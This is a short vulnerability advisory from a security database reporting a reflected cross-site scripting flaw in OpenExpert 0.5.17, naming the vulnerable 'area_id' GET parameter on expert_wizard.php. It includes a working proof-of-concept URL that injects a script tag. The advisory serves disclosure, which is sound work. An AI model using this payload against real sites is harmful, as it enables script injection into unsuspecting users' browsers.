OpenExpert 0.5.17 Cross Site Scripting

Published
Credit
Risk
2017.01.19
Nassim Asrir
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes

# Title : Openexpert 0.5.17 - Cross Site Scripting

# Author: Nassim Asrir

# Author Company: Henceforth

# Tested on: Winxp sp3 - win7

# Vendor: https://sourceforge.net/projects/law-expert/

# Download Software: https://sourceforge.net/projects/law-expert/files/

#################################################

## About The Product : ##

OpenExpert. Dual use Web based and Easy to Use Expert System or Education System.

## Vulnerability : ##

- Vulnerable Parametre : area_id

- HTTP Method : GET

- To exploit it : http://HOST/expert_wizard.php?area_id="><script>alert(1);</script>


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com